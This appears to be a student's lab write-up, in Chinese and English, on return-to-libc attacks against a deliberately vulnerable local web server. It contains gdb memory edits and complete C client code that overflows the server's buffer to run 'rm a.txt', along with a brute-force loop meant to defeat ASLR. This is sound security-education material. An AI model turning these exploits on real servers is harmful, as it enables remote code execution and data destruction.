zoukankan      html  css  js  c++  java
  • 信息安全实验二:return-to-libc

    title: return-to-libc
    date: 2016-01-11 17:40:30
    categories: information-security
    tags: return-to-libc

    • Exercise1
      The Ubuntu 12.04 OS you've been using in this lab has the non-executable stack support by default.
      To compile a C program, just use the -z noexecstack option to mark the stack segment non-executable.
      Re-compile the vulnerable program stack2.c from lab 1:
      $ make stack2
      • perform a buffer-overflow attack as you do in Lab1, can you succeed any more? What do you observe?
        不能成功 栈不可执行
      

    • Exercise2
      Use gdb to smash the function stack, the C program offered you here is exec3.c.
      • As follows:
        ...
        p system
        $9=0xf7e5fe80
        p/x $ebp+16
        $10=0xffffd278
        p/x $ebp+4
        $11=0xffffd26c
        set *0xffffd278=0x736c
        x/s 0xffffd278
        0xffffd278:"ls"
        p/x $ebp+12 
        $12=0xffffd274
        set *0xffffd274=0xffffd278
        set *0xffffd26c=0xf7e5fe80
        c 
        Return to fun!
        browser.c exec3 exec3.c Makefile server stack2 stack2.c
      
        Program received signal SIGSEGV,Segmentation fault
      
      As you can see, the command system(“ls”) constructed by gdb runs smoothly, but not perfect.
      What triggered the “SIGSEG” fault? Modify the process memory in gdb just like above,
      to to let the process exit gracefully.
      • we can call exit(0) after calling system("ls")
        ...
        p system
        $9=0xf7e5fe80
        p exit
        $10=0xf7e53b60
        p/x $ebp+16
        $11=0xffffd278
        p/x $ebp+8
        $12=0xffffd270
        set *0xffffd270=0xf7e53b60
        p/x $ebp+4
        $13=0xffffd26c
        set *0xffffd278=0x736c
        x/s 0xffffd278
        0xffffd278:"ls"
        p/x $ebp+12 
        $14=0xffffd274
        set *0xffffd274=0xffffd278
        set *0xffffd26c=0xf7e5fe80
        c 
        Return to fun!
        browser.c exec3 exec3.c Makefile server stack2 stack2.c
      

    • Exercise3
      try to perform a return-to-libc attack by contructing and sending a malicious request containing your shellcode.
      Your shellcode can still delete a file from the web server, or can do something else.
        gdb调试,确定服务器s数组到$ebp的距离1056
        $ebp+4存放system地址
        $ebp+8存放exit地址
        $ebp+12存放"rm a.txt"地址
        构造req数组
        char req[len];
        memset(req,'A',len);
        req[len-4]='
      ';
        req[len-3]='
      ';
        req[len-2]='
      ';
        req[len-1]='
      ';
        req[0]='r';
        req[1]='m';
        req[2]='	';
        req[3]='a';
        req[4]='.';
        req[5]='t';
        req[6]='x';
        req[7]='t';
        req[8]='';
        req[1060]=0x60;//system地址
        req[1061]=0xe3;
        req[1062]=0xe4;
        req[1063]=0xb7;
      
        req[1064]=0x50;//exit地址
        req[1065]=0x11;
        req[1066]=0xe4;
        req[1067]=0xb7;
        
        req[1068]=0xb8;//"rm a.txt"地址
        req[1069]=0xef;
        req[1070]=0xff;
        req[1071]=0xbf;
        运行结果,成功删除了服务器端文件a.txt
        再次运行,显示文件a.txt不存在
      
      • 完整代码browser.c
        #include <stdio.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <netinet/in.h>
        #include <arpa/inet.h>
        #include <unistd.h>
        #include <string.h>
        #include <fcntl.h>
        #include <sys/shm.h>
      
        #define PORT  8080
      
        int main(int argc, char *argv[])
        {
          int  port = PORT;
          if (argc>1)
        	port = atoi(argv[1]);
      
          int sock_client = socket(AF_INET,SOCK_STREAM, 0);//sock fd
          
          struct sockaddr_in addr;
          memset(&addr, 0, sizeof(addr));
          addr.sin_family = AF_INET;
          addr.sin_port = htons(port);  //server port
          
          addr.sin_addr.s_addr = inet_addr("127.0.0.1");  ///server ip address
      
          
          if (connect(sock_client, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        	{
        	  perror("connect");
        	  exit(1);
        	}
         
          printf("sock_client = %d
      ",sock_client);
          
          #define len 1100  
          char req[len];
          memset(req,'A',len);
          req[len-4]='
      ',
          req[len-3]='
      ',
          req[len-2]='
      ',
          req[len-1]='
      ';
          
          req[0]='r';
          req[1]='m';
          req[2]='	';
          req[3]='a';
          req[4]='.';
          req[5]='t';
          req[6]='x';
          req[7]='t';
          req[8]='';
      
          req[1060]=0x60;
          req[1061]=0xe3;
          req[1062]=0xe4;
          req[1063]=0xb7;
      
          req[1064]=0x50;
          req[1065]=0x11;
          req[1066]=0xe4;
          req[1067]=0xb7;
      
          req[1068]=0xb8;
          req[1069]=0xef;
          req[1070]=0xff;
          req[1071]=0xbf;
      
          write(sock_client,req,len);
          char resp[1024];
          int num = 0;
          while(read (sock_client, &resp[num], 1))
        	num++;
          resp[num] = 0;
          printf("Response = %s
      ",resp);
          close(sock_client);
          
          return 0;
        }
      

    • Exercise4
      Now, turn on the Ubuntu’s address space layout randomization:
      sysctl -w kernel.randomize_va_space=2
      Try to attack the web server using buffer overflow. Can you succeed?
      • Where is the buffer’s address? Is it exploitable?
        不能成功 地址变化
      

    • Exercise5
      To defeat ASLR, we can use the Brute Force attack technique,
      which is simple but effective in guessing the variable buffer address.
      The basic idea is that although we don’t know the exact address of the buffer,
      however, we know its range, say, from 0x00000000 to 0xbfffffff.
      So, by trying each address in turn, we’ll hit the right address sooner or later.
      • 爆破
        打开地址随机化
        打开栈不可执行
        通过gdb调试多次,观察得出:
        &ebp地址距离s数组的距离不变,始终是1056
        system地址0xbf****60
        exit地址0xbf******
        s地址0xbf******
        忽略程序的正常退出,通过创建5层循环,从0x00遍历到0xff
        在每一次循环结束后,客户端会断开连接
        在新一次循环时,客户端会再次连接
      
      • 完整代码browser.c
        #include <stdio.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <netinet/in.h>
        #include <arpa/inet.h>
        #include <unistd.h>
        #include <string.h>
        #include <fcntl.h>
        #include <sys/shm.h>
      
        #define PORT  8080
      
        int main(int argc, char *argv[])
        {
          int  port = PORT;
          if (argc>1)
        	port = atoi(argv[1]);
      
          int sock_client;
          struct sockaddr_in addr;
          memset(&addr, 0, sizeof(addr));
          addr.sin_family = AF_INET;
          addr.sin_port = htons(port);  //server port 
          addr.sin_addr.s_addr = inet_addr("127.0.0.1");  //server ip address
      
          printf("sock_client = %d
      ",sock_client);
          
          #define len 1100  
          char req[len];
          memset(req,'A',len);
          req[len-4]='
      ',
          req[len-3]='
      ',
          req[len-2]='
      ',
          req[len-1]='
      ';
      
          req[0]='r';
          req[1]='m';
          req[2]='	';
          req[3]='a';
          req[4]='.';
          req[5]='t';
          req[6]='x';
          req[7]='t';
          req[8]='';
      
          int sys1,sys2;
          int s1,s2,s3;
          int dist=1056;
      
          req[dist+4]=0x60;
          req[dist+7]=0xb7;
          req[dist+15]=0xbf;
      
          for(sys1=0x1;sys1<=0xff;++sys1)
          {
        	for(sys2=0x1;sys2<=0xff;++sys2)
        	{
        	  for(s1=0x1;s1<=0xff;++s1)
        	  {
        		for(s2=0x1;s2<=0xff;++s2)
        		{
        		  for(s3=0x1;s3<=0xff;++s3)
        			{
          req[dist+5]=sys1;
          req[dist+6]=sys2;
          req[dist+12]=s1;
          req[dist+13]=s2;
          req[dist+14]=s3;
      
      
        	int sock_client = socket(AF_INET,SOCK_STREAM, 0);//sock fd
      
           if (connect(sock_client, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        	{
        	  perror("connect");
        	  exit(1);
        	}
      
          write(sock_client,req,len);
      
          close(sock_client);
      
        		  }
        		}
        	  }
        	}
      
          }
          return 0;
        }
      
    ========================if i have some wrong, please give me a message, thx.========================
  • 相关阅读:
    今天入住博客园,希望有个好的开始,自己在这边可以学习成长
    浅谈 C# ref 和 out 的使用方法
    类之间的几种关系
    VB6.0 文件日志读取
    基于NPOI的Excel导入和导出功能
    WebService的创建,发布与调用
    C# OfType 的使用
    Vb6.0 文件日志记录
    ZipInputStream
    [转载]遗传算法入门
  • 原文地址:https://www.cnblogs.com/ailx10/p/5251646.html
Copyright © 2011-2022 走看看